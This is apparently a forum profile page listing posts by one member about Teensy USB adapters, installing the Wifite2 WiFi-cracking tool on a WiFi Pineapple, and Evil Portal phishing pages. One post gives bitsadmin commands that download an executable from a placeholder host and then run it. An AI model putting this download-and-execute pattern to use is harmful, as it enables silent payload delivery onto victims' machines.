Jump to content

kleo

Active Members
  • Posts

    227
  • Joined

  • Last visited

  • Days Won

    8

Posts posted by kleo

  1. Since the Teensy 2.0++ uses a mini b port, you could use a male mini b - usb cable to usb male plug. 

    I use these adapters for my Teensy 3.6 since they have a micro b port.

    Untitled.thumb.png.a5532d8ade2da9944c407bb42fb4d5c4.png

    Edit:

    @4l4k4z4m

    Technically you could do it but it would be too fiddly to solder wires to attach usb wires onto the board. I wouldn't recommend it unless you have a lot of Teensy boards lying around to mess with. This is how I ruined my older Teensy 2.0 board.

    You could follow this as a guide for replacing mini b to micro b https://www.youtube.com/watch?v=mOsBbEZ_1Lo

    Same goes if you want to solder wires directly.

     

     

  2. Wifite2 WiFi Pineapple Setup

    Simple setup to use Wifite2 on your WiFi Pineapple. Credits to the contributors of Wifite2.

     

    Requirements:

    1. Mounted flashdrive on the WiFi Pineapple. (We won't be using an sdcard due to a kernel bug, still present on the latest version 2.0.2, pointed out by Zylla, https://www.wifipineapple.com/bugs/511)

    2. Flashdrive format script by Zylla:

    Mirror: https://gist.github.com/kbeflo/8c85c084e9c5ae86b3367716a463e793

    3. Mount flashdrive on boot

    # Mount flashdrive on boot
    
    # create mount.sh at /root/
    mount /dev/sdb1 /sd
    swapon /dev/sdb2
    
    # include these lines at /etc/rc.local
    
    sleep 5
    ./root/mount.sh
    

     

     

    Wifite2:

    Github: https://github.com/derv82/wifite2

     

    opkg update
    
    # tetra
    opkg install git git-http coreutils-stty
    
    git clone git://github.com/derv82/wifite2.git
    
    cd wifite2/
    
    ./Wifite.py
    
    # nano with sd card
    opkg install --dest sd git git-http coreutils-stty
    
    cd /sd/
    
    git clone git://github.com/derv82/wifite2.git
    
    cd wifite2/
    
    ./Wifite.py

     

     

     

    • Like 2
    • Upvote 1
  3. You could use Bitsadmin.

    Download on the current directory

    bitsadmin /transfer "job" https://foo.com/bar.exe "%cd%\bar.exe"

    Download to specified directory

    bitsadmin /transfer "job" https://foo.com/bar.exe "C:\folder\bar.exe"

    Download and then execute

    cmd.exe /c "bitsadmin /transfer job https://foo.com/bar.exe C:\folder\bar.exe&start bar.exe"

     

     

  4. 49 minutes ago, OttoSchmit said:

    Yeah i checked that one out...

    I don't think you really did.

    49 minutes ago, OttoSchmit said:

    however i think that the documentation (on phishing inparticullar) is pretty poor....

    Any more would be spoon-feed.

    49 minutes ago, OttoSchmit said:

    Does someone have an idea about what "evil portals" actually is? Are they pre configured ones for evil portal?

    They were made for the Evil Portal module.

    • Upvote 1
  5. Quick fix:

    Open wifite-ng file using your favorite text editor

    Go to line 183, and modify dir='/tmp/' to dir='/sd/tmp/'

    After that create tmp folder on your sd card, mkdir /sd/tmp

    I apologize for the neglect on this issue.

    Made the fix on the install script, just rerun the setup again.

×
×
  • Create New...